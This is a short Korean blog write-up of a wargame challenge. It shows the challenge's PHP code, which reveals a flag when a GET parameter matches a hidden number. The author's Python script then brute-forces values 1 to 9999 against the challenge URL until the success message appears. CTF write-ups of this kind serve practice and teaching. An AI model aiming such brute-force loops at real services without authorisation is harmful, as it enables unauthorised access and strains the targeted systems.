-
Ch4n3 World - Lucky Number? (Coding)정보보안/웹 2018. 1. 19. 19:22
- <?php
- $luckyNumber = "????";
- include('./lucky_conf.php'); //flag is defined in this file
- if(isset($_GET['lucky'])) {
- $getLucky = $_GET['lucky'];
- if($luckyNumber != $getLucky) {
- echo("Lucky number is not correct.<hr>");
- } else {
- echo("Lucky number! You can get the flag<hr>");
- die($flag);
- }
- }
- highlight_file(__FILE__);
- ?>
페이지에서 GET으로 lucky 변수의 값을 받는데 그 값이 magic number가 되면 Flag를 준다.
코드를 짜서 브포때리는 것을 의도한 문제로 친절하게 범위까지 준다.
- import re
- import urllib
- for i in range(1, 9999):
- fw=urllib.urlopen("http://chaneyoon.dothome.co.kr/lucky.php?lucky=%s"%i)
- read=fw.read()
- flag=re.findall("Lucky number! You can get the flag", read)
- if flag:
- print "Lucky number is: %d"%i
- break
구글링을 하면 나오는 다른 워게임 문제 풀이를 참고해서 저렇게 Python코드를 짰다.
lucky 값을 브포하고(range 범위는 헷갈리긴 한데 답을 1이나 9999로 해둘 사람은 없으니 그냥 해도 상관없어 보인다),
사이트를 읽어와서 "Lucky number! You can get the flag" 문자열이 있으면 해당 lucky 값을 출력하는 것이다.
실행하니 Lucky number가 나오는데 그걸 문제 사이트에 전달하면 아래처럼 Flag가 나와서 기분이 좋아진다.
